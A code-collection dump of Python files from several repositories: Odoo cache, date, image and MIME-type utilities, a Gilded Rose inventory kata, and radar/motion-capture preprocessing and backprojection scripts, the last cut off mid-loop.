def get_fields(self, record):
""" Return the fields with a value for ``record``. """
for name, field in record._fields.items():
key = record.env.cache_key(field)
if name != 'id' and record.id in self._data[key].get(field, ()):
yield field
def get_records(self, model, field):
""" Return the records of ``model`` that have a value for ``field``. """
key = model.env.cache_key(field)
ids = list(self._data[key][field])
return model.browse(ids)
def get_missing_ids(self, records, field):
""" Return the ids of ``records`` that have no value for ``field``. """
key = records.env.cache_key(field)
field_cache = self._data[key][field]
for record_id in records._ids:
if record_id not in field_cache:
yield record_id
def copy(self, records, env):
""" Copy the cache of ``records`` to ``env``. """
src, dst = records.env, env
for src_key, dst_key in [(src, dst), (src._cache_key, dst._cache_key)]:
if src_key == dst_key:
break
src_cache = self._data[src_key]
dst_cache = self._data[dst_key]
for field, src_field_cache in src_cache.items():
dst_field_cache = dst_cache[field]
for record_id, value in src_field_cache.items():
if not isinstance(value, SpecialValue):
# But not if it's a SpecialValue, which often is an access error
# because the other environment (eg. sudo()) is well expected to have access.
dst_field_cache[record_id] = value
def invalidate(self, spec=None):
""" Invalidate the cache, partially or totally depending on ``spec``. """
if spec is None:
self._data.clear()
elif spec:
for field, ids in spec:
if ids is None:
for data in self._data.values():
data.pop(field, None)
else:
for data in self._data.values():
field_cache = data.get(field)
if field_cache:
for id in ids:
field_cache.pop(id, None)
def check(self, env):
""" Check the consistency of the cache for the given environment. """
# make a full copy of the cache, and invalidate it
dump = defaultdict(dict)
for key in [env, env._cache_key]:
key_cache = self._data[key]
for field, field_cache in key_cache.items():
for record_id, value in field_cache.items():
if record_id:
dump[field][record_id] = value
self.invalidate()
# re-fetch the records, and compare with their former cache
invalids = []
for field, field_dump in dump.items():
records = env[field.model_name].browse(field_dump)
for record in records:
try:
cached = field_dump[record.id]
cached = cached.get() if isinstance(cached, SpecialValue) else cached
value = field.convert_to_record(cached, record)
fetched = record[field.name]
if fetched != value:
info = {'cached': value, 'fetched': fetched}
invalids.append((record, field, info))
except (AccessError, MissingError):
pass
if invalids:
raise UserError('Invalid cache for fields\n' + pformat(invalids))
class SpecialValue(object):
""" Wrapper for a function to get the cached value of a field. """
__slots__ = ['get']
def __init__(self, getter):
self.get = getter
# keep those imports here in order to handle cyclic dependencies correctly
from odoo import SUPERUSER_ID
from odoo.exceptions import UserError, AccessError, MissingError
from odoo.modules.registry import Registry
```
#### File: odoo/tools/date_utils.py
```python
import math
import calendar
from datetime import date, datetime, time
import pytz
from dateutil.relativedelta import relativedelta
from . import ustr
def get_month(date):
''' Compute the month dates range on which the 'date' parameter belongs to.
:param date: A datetime.datetime or datetime.date object.
:return: A tuple (date_from, date_to) having the same object type as the 'date' parameter.
'''
date_from = type(date)(date.year, date.month, 1)
date_to = type(date)(date.year, date.month, calendar.monthrange(date.year, date.month)[1])
return date_from, date_to
def get_quarter_number(date):
''' Get the number of the quarter on which the 'date' parameter belongs to.
:param date: A datetime.datetime or datetime.date object.
:return: A [1-4] integer.
'''
return math.ceil(date.month / 3)
def get_quarter(date):
''' Compute the quarter dates range on which the 'date' parameter belongs to.
:param date: A datetime.datetime or datetime.date object.
:return: A tuple (date_from, date_to) having the same object type as the 'date' parameter.
'''
quarter_number = get_quarter_number(date)
month_from = ((quarter_number - 1) * 3) + 1
date_from = type(date)(date.year, month_from, 1)
date_to = (date_from + relativedelta(months=2))
date_to = date_to.replace(day=calendar.monthrange(date_to.year, date_to.month)[1])
return date_from, date_to
def get_fiscal_year(date, day=31, month=12):
''' Compute the fiscal year dates range on which the 'date' parameter belongs to.
A fiscal year is the period used by governments for accounting purposes and vary between countries.
By default, calling this method with only one parameter gives the calendar year because the ending date of the
fiscal year is set to the YYYY-12-31.
:param date: A datetime.datetime or datetime.date object.
:param day: The day of month the fiscal year ends.
:param month: The month of year the fiscal year ends.
:return: A tuple (date_from, date_to) having the same object type as the 'date' parameter.
'''
max_day = calendar.monthrange(date.year, month)[1]
date_to = type(date)(date.year, month, min(day, max_day))
# Force at 29 February instead of 28 in case of leap year.
if date_to.month == 2 and date_to.day == 28 and max_day == 29:
date_to = type(date)(date.year, 2, 29)
if date <= date_to:
date_from = date_to - relativedelta(years=1)
max_day = calendar.monthrange(date_from.year, date_from.month)[1]
# Force at 29 February instead of 28 in case of leap year.
if date_from.month == 2 and date_from.day == 28 and max_day == 29:
date_from = type(date)(date_from.year, 2, 29)
date_from += relativedelta(days=1)
else:
date_from = date_to + relativedelta(days=1)
max_day = calendar.monthrange(date_to.year + 1, date_to.month)[1]
date_to = type(date)(date.year + 1, month, min(day, max_day))
# Force at 29 February instead of 28 in case of leap year.
if date_to.month == 2 and date_to.day == 28 and max_day == 29:
date_to += relativedelta(days=1)
return date_from, date_to
def start_of(value, granularity):
"""
Get start of a time period from a date or a datetime.
:param value: initial date or datetime.
:param granularity: type of period in string, can be year, quarter, month, week, day or hour.
:return: a date/datetime object corresponding to the start of the specified period.
"""
is_datetime = isinstance(value, datetime)
if granularity == "year":
result = value.replace(month=1, day=1)
elif granularity == "quarter":
# Q1 = Jan 1st
# Q2 = Apr 1st
# Q3 = Jul 1st
# Q4 = Oct 1st
result = get_quarter(value)[0]
elif granularity == "month":
result = value.replace(day=1)
elif granularity == 'week':
# `calendar.weekday` uses ISO8601 for start of week reference, this means that
# by default MONDAY is the first day of the week and SUNDAY is the last.
result = value - relativedelta(days=calendar.weekday(value.year, value.month, value.day))
elif granularity == "day":
result = value
elif granularity == "hour" and is_datetime:
return datetime.combine(value, time.min).replace(hour=value.hour)
elif is_datetime:
raise ValueError(
"Granularity must be year, quarter, month, week, day or hour for value %s" % value
)
else:
raise ValueError(
"Granularity must be year, quarter, month, week or day for value %s" % value
)
return datetime.combine(result, time.min) if is_datetime else result
def end_of(value, granularity):
"""
Get end of a time period from a date or a datetime.
:param value: initial date or datetime.
:param granularity: Type of period in string, can be year, quarter, month, week, day or hour.
:return: A date/datetime object corresponding to the start of the specified period.
"""
is_datetime = isinstance(value, datetime)
if granularity == "year":
result = value.replace(month=12, day=31)
elif granularity == "quarter":
# Q1 = Mar 31st
# Q2 = Jun 30th
# Q3 = Sep 30th
# Q4 = Dec 31st
result = get_quarter(value)[1]
elif granularity == "month":
result = value + relativedelta(day=1, months=1, days=-1)
elif granularity == 'week':
# `calendar.weekday` uses ISO8601 for start of week reference, this means that
# by default MONDAY is the first day of the week and SUNDAY is the last.
result = value + relativedelta(days=6-calendar.weekday(value.year, value.month, value.day))
elif granularity == "day":
result = value
elif granularity == "hour" and is_datetime:
return datetime.combine(value, time.max).replace(hour=value.hour)
elif is_datetime:
raise ValueError(
"Granularity must be year, quarter, month, week, day or hour for value %s" % value
)
else:
raise ValueError(
"Granularity must be year, quarter, month, week or day for value %s" % value
)
return datetime.combine(result, time.max) if is_datetime else result
def add(value, *args, **kwargs):
"""
Return the sum of ``value`` and a :class:`relativedelta`.
:param value: initial date or datetime.
:param args: positional args to pass directly to :class:`relativedelta`.
:param kwargs: keyword args to pass directly to :class:`relativedelta`.
:return: the resulting date/datetime.
"""
return value + relativedelta(*args, **kwargs)
def subtract(value, *args, **kwargs):
"""
Return the difference between ``value`` and a :class:`relativedelta`.
:param value: initial date or datetime.
:param args: positional args to pass directly to :class:`relativedelta`.
:param kwargs: keyword args to pass directly to :class:`relativedelta`.
:return: the resulting date/datetime.
"""
return value - relativedelta(*args, **kwargs)
def json_default(obj):
"""
Properly serializes date and datetime objects.
"""
from odoo import fields
if isinstance(obj, date):
if isinstance(obj, datetime):
return fields.Datetime.to_string(obj)
return fields.Date.to_string(obj)
return ustr(obj)
def date_range(start, end, step=relativedelta(months=1)):
"""Date range generator with a step interval.
:param start datetime: begining date of the range.
:param end datetime: ending date of the range.
:param step relativedelta: interval of the range.
:return: a range of datetime from start to end.
:rtype: Iterator[datetime]
"""
are_naive = start.tzinfo is None and end.tzinfo is None
are_utc = start.tzinfo == pytz.utc and end.tzinfo == pytz.utc
# Cases with miscellenous timezone are more complexe because of DST.
are_others = start.tzinfo and end.tzinfo and not are_utc
if are_others:
if start.tzinfo.zone != end.tzinfo.zone:
raise ValueError("Timezones of start argument and end argument seem inconsistent")
if not are_naive and not are_utc and not are_others:
raise ValueError("Timezones of start argument and end argument mismatch")
if start > end:
raise ValueError("start > end, start date must be before end")
if start == start + step:
raise ValueError("Looks like step is null")
if start.tzinfo:
localize = start.tzinfo.localize
else:
localize = lambda dt: dt
dt = start.replace(tzinfo=None)
end = end.replace(tzinfo=None)
while dt <= end:
yield localize(dt)
dt = dt + step
```
#### File: odoo/tools/image.py
```python
import base64
import codecs
import io
from PIL import Image
from PIL import ImageEnhance
from random import randrange
# Preload PIL with the minimal subset of image formats we need
from odoo.tools import pycompat
Image.preinit()
Image._initialized = 2
# Maps only the 6 first bits of the base64 data, accurate enough
# for our purpose and faster than decoding the full blob first
FILETYPE_BASE64_MAGICWORD = {
b'/': 'jpg',
b'R': 'gif',
b'i': 'png',
b'P': 'svg+xml',
}
# ----------------------------------------
# Image resizing
# ----------------------------------------
def image_resize_image(base64_source, size=(1024, 1024), encoding='base64', filetype=None, avoid_if_small=False, upper_limit=False):
""" Function to resize an image. The image will be resized to the given
size, while keeping the aspect ratios, and holes in the image will be
filled with transparent background. The image will not be stretched if
smaller than the expected size.
Steps of the resizing:
- Compute width and height if not specified.
- if avoid_if_small: if both image sizes are smaller than the requested
sizes, the original image is returned. This is used to avoid adding
transparent content around images that we do not want to alter but
just resize if too big. This is used for example when storing images
in the 'image' field: we keep the original image, resized to a maximal
size, without adding transparent content around it if smaller.
- create a thumbnail of the source image through using the thumbnail
function. Aspect ratios are preserved when using it. Note that if the
source image is smaller than the expected size, it will not be
extended, but filled to match the size.
- create a transparent background that will hold the final image.
- paste the thumbnail on the transparent background and center it.
:param base64_source: base64-encoded version of the source
image; if False, returns False
:param size: 2-tuple(width, height). A None value for any of width or
height mean an automatically computed value based respectively
on height or width of the source image.
:param encoding: the output encoding
:param filetype: the output filetype, by default the source image's
:type filetype: str, any PIL image format (supported for creation)
:param avoid_if_small: do not resize if image height and width
are smaller than the expected size.
"""
if not base64_source:
return False
# Return unmodified content if no resize or we etect first 6 bits of '<'
# (0x3C) for SVG documents - This will bypass XML files as well, but it's
# harmless for these purposes
if size == (None, None) or base64_source[:1] == b'P':
return base64_source
image_stream = io.BytesIO(codecs.decode(base64_source, encoding))
image = Image.open(image_stream)
# store filetype here, as Image.new below will lose image.format
filetype = (filetype or image.format).upper()
filetype = {
'BMP': 'PNG',
}.get(filetype, filetype)
asked_width, asked_height = size
if upper_limit:
if asked_width:
if asked_width >= image.size[0]:
asked_width = image.size[0]
if asked_height:
if asked_height >= image.size[1]:
asked_height = image.size[1]
if image.size[0] >= image.size[1]:
asked_height = None
else:
asked_width = None
if asked_width is None and asked_height is None:
return base64_source
if asked_width is None:
asked_width = int(image.size[0] * (float(asked_height) / image.size[1]))
if asked_height is None:
asked_height = int(image.size[1] * (float(asked_width) / image.size[0]))
size = asked_width, asked_height
# check image size: do not create a thumbnail if avoiding smaller images
if avoid_if_small and image.size[0] <= size[0] and image.size[1] <= size[1]:
return base64_source
if image.size != size:
image = image_resize_and_sharpen(image, size, upper_limit=upper_limit)
if image.mode not in ["1", "L", "P", "RGB", "RGBA"] or (filetype == 'JPEG' and image.mode == 'RGBA'):
image = image.convert("RGB")
background_stream = io.BytesIO()
image.save(background_stream, filetype)
return codecs.encode(background_stream.getvalue(), encoding)
def image_resize_and_sharpen(image, size, preserve_aspect_ratio=False, factor=2.0, upper_limit=False):
"""
Create a thumbnail by resizing while keeping ratio.
A sharpen filter is applied for a better looking result.
:param image: PIL.Image.Image()
:param size: 2-tuple(width, height)
:param preserve_aspect_ratio: boolean (default: False)
:param factor: Sharpen factor (default: 2.0)
"""
origin_mode = image.mode
if image.mode != 'RGBA':
image = image.convert('RGBA')
image.thumbnail(size, Image.ANTIALIAS)
if preserve_aspect_ratio:
size = image.size
sharpener = ImageEnhance.Sharpness(image)
resized_image = sharpener.enhance(factor)
# create a transparent image for background and paste the image on it
if upper_limit:
image = Image.new('RGBA', (size[0], size[1]-3), (255, 255, 255, 0)) # FIXME temporary fix for trimming the ghost border.
else:
image = Image.new('RGBA', size, (255, 255, 255, 0))
image.paste(resized_image, ((size[0] - resized_image.size[0]) // 2, (size[1] - resized_image.size[1]) // 2))
if image.mode != origin_mode:
image = image.convert(origin_mode)
return image
def image_save_for_web(image, fp=None, format=None):
"""
Save image optimized for web usage.
:param image: PIL.Image.Image()
:param fp: File name or file object. If not specified, a bytestring is returned.
:param format: File format if could not be deduced from image.
"""
opt = dict(format=image.format or format)
if image.format == 'PNG':
opt.update(optimize=True)
if image.mode != 'P':
# Floyd Steinberg dithering by default
image = image.convert('RGBA').convert('P', palette=Image.WEB, colors=256)
elif image.format == 'JPEG':
opt.update(optimize=True, quality=80)
if fp:
image.save(fp, **opt)
else:
img = io.BytesIO()
image.save(img, **opt)
return img.getvalue()
def image_resize_image_big(base64_source, size=(1024, 1024), encoding='base64', filetype=None, avoid_if_small=True):
""" Wrapper on image_resize_image, to resize images larger than the standard
'big' image size: 1024x1024px.
:param size, encoding, filetype, avoid_if_small: refer to image_resize_image
"""
return image_resize_image(base64_source, size, encoding, filetype, avoid_if_small)
def image_resize_image_medium(base64_source, size=(128, 128), encoding='base64', filetype=None, avoid_if_small=False):
""" Wrapper on image_resize_image, to resize to the standard 'medium'
image size: 180x180.
:param size, encoding, filetype, avoid_if_small: refer to image_resize_image
"""
return image_resize_image(base64_source, size, encoding, filetype, avoid_if_small)
def image_resize_image_small(base64_source, size=(64, 64), encoding='base64', filetype=None, avoid_if_small=False):
""" Wrapper on image_resize_image, to resize to the standard 'small' image
size: 50x50.
:param size, encoding, filetype, avoid_if_small: refer to image_resize_image
"""
return image_resize_image(base64_source, size, encoding, filetype, avoid_if_small)
# ----------------------------------------
# Crop Image
# ----------------------------------------
def crop_image(data, type='top', ratio=False, size=None, image_format=None):
""" Used for cropping image and create thumbnail
:param data: base64 data of image.
:param type: Used for cropping position possible
Possible Values : 'top', 'center', 'bottom'
:param ratio: Cropping ratio
e.g for (4,3), (16,9), (16,10) etc
send ratio(1,1) to generate square image
:param size: Resize image to size
e.g (200, 200)
after crop resize to 200x200 thumbnail
:param image_format: return image format PNG,JPEG etc
"""
if not data:
return False
image_stream = Image.open(io.BytesIO(base64.b64decode(data)))
output_stream = io.BytesIO()
w, h = image_stream.size
new_h = h
new_w = w
if ratio:
w_ratio, h_ratio = ratio
new_h = (w * h_ratio) // w_ratio
new_w = w
if new_h > h:
new_h = h
new_w = (h * w_ratio) // h_ratio
image_format = image_format or image_stream.format or 'JPEG'
if type == "top":
cropped_image = image_stream.crop((0, 0, new_w, new_h))
cropped_image.save(output_stream, format=image_format)
elif type == "center":
cropped_image = image_stream.crop(((w - new_w) // 2, (h - new_h) // 2, (w + new_w) // 2, (h + new_h) // 2))
cropped_image.save(output_stream, format=image_format)
elif type == "bottom":
cropped_image = image_stream.crop((0, h - new_h, new_w, h))
cropped_image.save(output_stream, format=image_format)
else:
raise ValueError('ERROR: invalid value for crop_type')
if size:
thumbnail = Image.open(io.BytesIO(output_stream.getvalue()))
output_stream.truncate(0)
output_stream.seek(0)
thumbnail.thumbnail(size, Image.ANTIALIAS)
thumbnail.save(output_stream, image_format)
return base64.b64encode(output_stream.getvalue())
# ----------------------------------------
# Colors
# ---------------------------------------
def image_colorize(original, randomize=True, color=(255, 255, 255)):
""" Add a color to the transparent background of an image.
:param original: file object on the original image file
:param randomize: randomize the background color
:param color: background-color, if not randomize
"""
# create a new image, based on the original one
original = Image.open(io.BytesIO(original))
image = Image.new('RGB', original.size)
# generate the background color, past it as background
if randomize:
color = (randrange(32, 224, 24), randrange(32, 224, 24), randrange(32, 224, 24))
image.paste(color, box=(0, 0) + original.size)
image.paste(original, mask=original)
# return the new image
buffer = io.BytesIO()
image.save(buffer, 'PNG')
return buffer.getvalue()
# ----------------------------------------
# Misc image tools
# ---------------------------------------
def image_get_resized_images(base64_source, return_big=False, return_medium=True, return_small=True,
big_name='image', medium_name='image_medium', small_name='image_small',
avoid_resize_big=True, avoid_resize_medium=False, avoid_resize_small=False, sizes={}):
""" Standard tool function that returns a dictionary containing the
big, medium and small versions of the source image. This function
is meant to be used for the methods of functional fields for
models using images.
Default parameters are given to be used for the getter of functional
image fields, for example with res.users or res.partner. It returns
only image_medium and image_small values, to update those fields.
:param base64_source: base64-encoded version of the source
image; if False, all returned values will be False
:param return_{..}: if set, computes and return the related resizing
of the image
:param {..}_name: key of the resized image in the return dictionary;
'image', 'image_medium' and 'image_small' by default.
:param avoid_resize_[..]: see avoid_if_small parameter
:return return_dict: dictionary with resized images, depending on
previous parameters.
"""
return_dict = dict()
size_big = sizes.get(big_name, (1024, 1024))
size_medium = sizes.get(medium_name, (128, 128))
size_small = sizes.get(small_name, (64, 64))
if isinstance(base64_source, pycompat.text_type):
base64_source = base64_source.encode('ascii')
if return_big:
return_dict[big_name] = image_resize_image_big(base64_source, avoid_if_small=avoid_resize_big, size=size_big)
if return_medium:
return_dict[medium_name] = image_resize_image_medium(base64_source, avoid_if_small=avoid_resize_medium, size=size_medium)
if return_small:
return_dict[small_name] = image_resize_image_small(base64_source, avoid_if_small=avoid_resize_small, size=size_small)
return return_dict
def image_resize_images(vals, big_name='image', medium_name='image_medium', small_name='image_small', sizes={}):
""" Update ``vals`` with image fields resized as expected. """
if vals.get(big_name):
vals.update(image_get_resized_images(vals[big_name],
return_big=True, return_medium=True, return_small=True,
big_name=big_name, medium_name=medium_name, small_name=small_name,
avoid_resize_big=True, avoid_resize_medium=False, avoid_resize_small=False, sizes=sizes))
elif vals.get(medium_name):
vals.update(image_get_resized_images(vals[medium_name],
return_big=True, return_medium=True, return_small=True,
big_name=big_name, medium_name=medium_name, small_name=small_name,
avoid_resize_big=True, avoid_resize_medium=True, avoid_resize_small=False, sizes=sizes))
elif vals.get(small_name):
vals.update(image_get_resized_images(vals[small_name],
return_big=True, return_medium=True, return_small=True,
big_name=big_name, medium_name=medium_name, small_name=small_name,
avoid_resize_big=True, avoid_resize_medium=True, avoid_resize_small=True, sizes=sizes))
elif big_name in vals or medium_name in vals or small_name in vals:
vals[big_name] = vals[medium_name] = vals[small_name] = False
def image_data_uri(base64_source):
"""This returns data URL scheme according RFC 2397
(https://tools.ietf.org/html/rfc2397) for all kind of supported images
(PNG, GIF, JPG and SVG), defaulting on PNG type if not mimetype detected.
"""
return 'data:image/%s;base64,%s' % (
FILETYPE_BASE64_MAGICWORD.get(base64_source[:1], 'png'),
base64_source.decode(),
)
if __name__=="__main__":
import sys
assert len(sys.argv)==3, 'Usage to Test: image.py SRC.png DEST.png'
img = base64.b64encode(open(sys.argv[1],'rb').read())
new = image_resize_image(img, (128,100))
open(sys.argv[2], 'wb').write(base64.b64decode(new))
```
#### File: odoo/tools/mimetypes.py
```python
import collections
import io
import logging
import re
import zipfile
__all__ = ['guess_mimetype']
_logger = logging.getLogger(__name__)
# We define our own guess_mimetype implementation and if magic is available we
# use it instead.
# discriminants for zip-based file formats
_ooxml_dirs = {
'word/': 'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
'pt/': 'application/vnd.openxmlformats-officedocument.presentationml.presentation',
'xl/': 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
}
def _check_ooxml(data):
with io.BytesIO(data) as f, zipfile.ZipFile(f) as z:
filenames = z.namelist()
# OOXML documents should have a [Content_Types].xml file for early
# check that we're interested in this thing at all
if '[Content_Types].xml' not in filenames:
return False
# then there is a directory whose name denotes the type of the file:
# word, pt (powerpoint) or xl (excel)
for dirname, mime in _ooxml_dirs.items():
if any(entry.startswith(dirname) for entry in filenames):
return mime
return False
# checks that a string looks kinda sorta like a mimetype
_mime_validator = re.compile(r"""
[\w-]+ # type-name
/ # subtype separator
[\w-]+ # registration facet or subtype
(?:\.[\w-]+)* # optional faceted name
(?:\+[\w-]+)? # optional structured syntax specifier
""", re.VERBOSE)
def _check_open_container_format(data):
# Open Document Format for Office Applications (OpenDocument) Version 1.2
#
# Part 3: Packages
# 3 Packages
# 3.3 MIME Media Type
with io.BytesIO(data) as f, zipfile.ZipFile(f) as z:
# If a MIME media type for a document exists, then an OpenDocument
# package should contain a file with name "mimetype".
if 'mimetype' not in z.namelist():
return False
# The content of this file shall be the ASCII encoded MIME media type
# associated with the document.
marcel = z.read('mimetype').decode('ascii')
# check that it's not too long (RFC6838 § 4.2 restricts type and
# subtype to 127 characters each + separator, strongly recommends
# limiting them to 64 but does not require it) and that it looks a lot
# like a valid mime type
if len(marcel) < 256 and _mime_validator.match(marcel):
return marcel
return False
_xls_pattern = re.compile(b"""
\x09\x08\x10\x00\x00\x06\x05\x00
| \xFD\xFF\xFF\xFF(\x10|\x1F|\x20|"|\\#|\\(|\\))
""", re.VERBOSE)
_ppt_pattern = re.compile(b"""
\x00\x6E\x1E\xF0
| \x0F\x00\xE8\x03
| \xA0\x46\x1D\xF0
| \xFD\xFF\xFF\xFF(\x0E|\x1C|\x43)\x00\x00\x00
""", re.VERBOSE)
def _check_olecf(data):
""" Pre-OOXML Office formats are OLE Compound Files which all use the same
file signature ("magic bytes") and should have a subheader at offset 512
(0x200).
Subheaders taken from http://www.garykessler.net/library/file_sigs.html
according to which Mac office files *may* have different subheaders. We'll
ignore that.
"""
offset = 0x200
if data.startswith(b'\xEC\xA5\xC1\x00', offset):
return 'application/msword'
# the _xls_pattern stuff doesn't seem to work correctly (the test file
# only has a bunch of \xf* at offset 0x200), that apparently works
elif b'Microsoft Excel' in data:
return 'application/vnd.ms-excel'
elif _ppt_pattern.match(data, offset):
return 'application/vnd.ms-powerpoint'
return False
def _check_svg(data):
"""This simply checks the existence of the opening and ending SVG tags"""
if b'<svg' in data and b'/svg>' in data:
return 'image/svg+xml'
# for "master" formats with many subformats, discriminants is a list of
# functions, tried in order and the first non-falsy value returned is the
# selected mime type. If all functions return falsy values, the master
# mimetype is returned.
_Entry = collections.namedtuple('_Entry', ['mimetype', 'signatures', 'discriminants'])
_mime_mappings = (
# pdf
_Entry('application/pdf', [b'%PDF'], []),
# jpg, jpeg, png, gif, bmp
_Entry('image/jpeg', [b'\xFF\xD8\xFF\xE0', b'\xFF\xD8\xFF\xE2', b'\xFF\xD8\xFF\xE3', b'\xFF\xD8\xFF\xE1'], []),
_Entry('image/png', [b'\x89PNG\r\n\x1A\n'], []),
_Entry('image/gif', [b'GIF87a', b'GIF89a'], []),
_Entry('image/bmp', [b'BM'], []),
_Entry('image/svg+xml', [b'<'], [
_check_svg,
]),
# OLECF files in general (Word, Excel, PPT, default to word because why not?)
_Entry('application/msword', [b'\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1', b'\x0D\x44\x4F\x43'], [
_check_olecf
]),
# zip, but will include jar, odt, ods, odp, docx, xlsx, pptx, apk
_Entry('application/zip', [b'PK\x03\x04'], [_check_ooxml, _check_open_container_format]),
)
def guess_mimetype(bin_data, default='application/octet-stream'):
""" Attempts to guess the mime type of the provided binary data, similar
to but significantly more limited than libmagic
:param str bin_data: binary data to try and guess a mime type for
:returns: matched mimetype or ``application/octet-stream`` if none matched
"""
# by default, guess the type using the magic number of file hex signature (like magic, but more limited)
# see http://www.filesignatures.net/ for file signatures
for entry in _mime_mappings:
for signature in entry.signatures:
if bin_data.startswith(signature):
for discriminant in entry.discriminants:
try:
guess = discriminant(bin_data)
if guess: return guess
except Exception:
# log-and-next
_logger.getChild('guess_mimetype').warn(
"Sub-checker '%s' of type '%s' failed",
discriminant.__name__, entry.mimetype,
exc_info=True
)
# if no discriminant or no discriminant matches, return
# primary mime type
return entry.mimetype
return default
try:
import magic
except ImportError:
magic = None
else:
# There are 2 python libs named 'magic' with incompatible api.
# magic from pypi https://pypi.python.org/pypi/python-magic/
if hasattr(magic,'from_buffer'):
guess_mimetype = lambda bin_data, default=None: magic.from_buffer(bin_data, mime=True)
# magic from file(1) https://packages.debian.org/squeeze/python-magic
elif hasattr(magic,'open'):
ms = magic.open(magic.MAGIC_MIME_TYPE)
ms.load()
guess_mimetype = lambda bin_data, default=None: ms.buffer(bin_data)
``` |
{
"source": "JJimenez-1/ollivanders_wands_shop",
"score": 3
} |
#### File: ollivanders_wands_shop/domain/updatable.py
```python
from abc import ABCMeta, abstractmethod
class Updatable(metaclass=ABCMeta):
@abstractmethod
def update_quality(self):
pass
```
#### File: JJimenez-1/ollivanders_wands_shop/main.py
```python
from domain.gildedrose import *
def main(days_passed):
inventory = Gildedrose([Normalitem("+5 Dexterity Vest", 10, 20),
Agedbrie("Aged Brie", 2, 0),
Normalitem("Elixir of the Mongoose", 5, 7),
Sulfuras("Sulfuras, Hand of Ragnaros", 0, 80),
Sulfuras("Sulfuras, Hand of Ragnaros", -1, 80),
Backstagepass("Backstage passes to a TAFKAL80ETC concert", 15, 20),
Backstagepass("Backstage passes to a TAFKAL80ETC concert", 10, 49),
Backstagepass("Backstage passes to a TAFKAL80ETC concert", 5, 49),
Conjured("Conjured Mana Cake", 3, 6)])
inventory.add_item()
actual_inventory = inventory.get_items()
print("----------- Inventory right now -----------")
for item in actual_inventory:
print(item)
for day in range(1, days_passed + 1):
print("---------- Inventory updated: Day " + str(day) + " ----------")
inventory.update_quality()
for item in inventory.items:
print(item)
list_of_items_updated = []
for item in inventory.items:
list_of_items_updated.append(item.__repr__())
return list_of_items_updated
if __name__ == "__main__":
main(30)
``` |
{
"source": "jjimmykang/bwsi-backprojection",
"score": 3
} |
#### File: backprojection/pulson440/preprocess_data.py
```python
import pickle
import argparse
import numpy as np
from math import floor
from matplotlib.animation import FuncAnimation, PillowWriter
import matplotlib.pyplot as plt
from matplotlib.ticker import Formatter
from matplotlib import transforms
import time
from backproj import backproject_vectorize_real
from helper_functions import replace_nan
def open_file(dir):
'''Takes the paths of the pickle files and opens them
Arguments:
dir(str)
the path of the file
Returns:
return_file(file)
the file itself
'''
with open(dir, 'rb') as f:
return_file = pickle.load(f)
return return_file
def main():
# Parse arguments
parser = argparse.ArgumentParser(description='preprocess sar data(with csv also)')
parser.add_argument('folder_path', type=str, help='path to folder')
parser.add_argument('radar_path', type=str, help='name of unpacked radar pickle file')
parser.add_argument('mocap_path', type=str, help='name of unpacked data file')
parser.add_argument('first_reflector_path', type=str, help='path to the first reflector mocap data')
parser.add_argument('second_reflector_path', type=str, help='path to the second reflector mocap data')
args = parser.parse_args()
# Fetch paths
radar_path = args.folder_path + '/' + args.radar_path
mocap_path = args.folder_path + '/' + args.mocap_path
return_data = {}
# Fetch radar data and put into dictionary
radar_data = open_file(radar_path)
return_data['scan_data'] = np.asarray(radar_data['scan_data'])
return_data['scan_timestamps'] = np.asarray(radar_data['timestamps'])
return_data['range_bins'] = np.asarray(radar_data['range_bins'])
print('scan_data.shape:', np.asarray(radar_data['scan_data']).shape)
print('scan_timestamps.shape:', np.asarray(radar_data['timestamps']).shape)
print('range_bins.shape:', np.asarray(radar_data['range_bins']).shape)
# Fetch mocap data(platform positions and timestamps)
mocap_data = open_file(mocap_path)
mocap_array = np.asarray(mocap_data)
platform_pos_temp = mocap_array[:, 0]
platform_pos = np.asarray(list(platform_pos_temp[:]))
print('platform_pos.shape:', platform_pos.shape)
motion_timestamps_temp = mocap_array[:, 1]
motion_timestamps = np.asarray(list(motion_timestamps_temp[:]))
print('motion_timestamps.shape:', motion_timestamps.shape)
# Fix NaNs with mocap data
return_data['motion_timestamps'], return_data['platform_pos'] = replace_nan(motion_timestamps, platform_pos)
# Fetch platform data
corner_reflector_pos = np.empty((2, 3))
reflector_1 = open_file(args.folder_path + '/' + args.first_reflector_path)
reflector_1_mocap = np.asarray(reflector_1)
corner_reflector_pos[0, :] = np.asarray(reflector_1[0][0])
reflector_2 = open_file(args.folder_path + '/' + args.second_reflector_path)
reflector_2_mocap = np.asarray(reflector_2)
corner_reflector_pos[1, :] = np.asarray(reflector_2[0][0])
return_data['corner_reflector_pos'] = corner_reflector_pos
# Paste output to pickle file in same directory
MASTER_PATH = args.folder_path + '/master_data.pkl'
with open(MASTER_PATH, 'wb') as p:
pickle.dump(return_data, p)
if __name__ == '__main__':
main()
```
#### File: legacy/deprecated_backproj/backproj copy.py
```python
import pickle
import bisect
import math
import numpy as np
import matplotlib.pyplot as plt
import time
from numba import vectorize
datafile_name = "./data/5Points_1way_data.pkl"
# datafile_name = "./data/challenge_fun.pkl"
with open(datafile_name, 'rb') as file:
data = pickle.load(file)
# print(data["range_bins"])
# last = 0
# for x in data["range_bins"][0] :
# print(x-last)
# last = x
# print("odjafoidsjfoi")
# print()
# print(data["scan_data"])
# print()
# print(data["platform_pos"])
data["scan_data"] = np.asarray(data["scan_data"])
data["platform_pos"] = np.asarray(data["platform_pos"])
data["range_bins"] = np.asarray(data["range_bins"])
x_loc_real = [6*a/120-3 for a in range(120)]
y_loc_real = [6*a/120-3 for a in range(120)]
pixels = [[b for b in range(120)] for a in range(120)]
@vectorize(['float32(float32, float32, float32, float32, float32, float32)'], target='cpu')
def distance(x_a, y_a, z_a, x_b, y_b, z_b) :
return ( (x_a-x_b)**2 + (y_a-y_b)**2 + (z_a-z_b)**2 ) ** .5
start_time = time.time()
for x in range(len(x_loc_real)) :
for y in range(len(y_loc_real)) :
x_loc = x_loc_real[x]
y_loc = y_loc_real[y]
z_loc = 0
total_dists = np.asarray([])
platform_locs_full = data["platform_pos"]
# print("PLATFORM LOCS DIMENSIONS")
# print(len(platform_locs_full))
# print(len(platform_locs_full[0]))
platform_locs_x = platform_locs_full[:,0]
platform_locs_y = platform_locs_full[:,1]
platform_locs_z = platform_locs_full[:,2]
x_locs = np.full(len(platform_locs_x), x_loc)
y_locs = np.full(len(platform_locs_y), y_loc)
z_locs = np.zeros(len(x_locs))
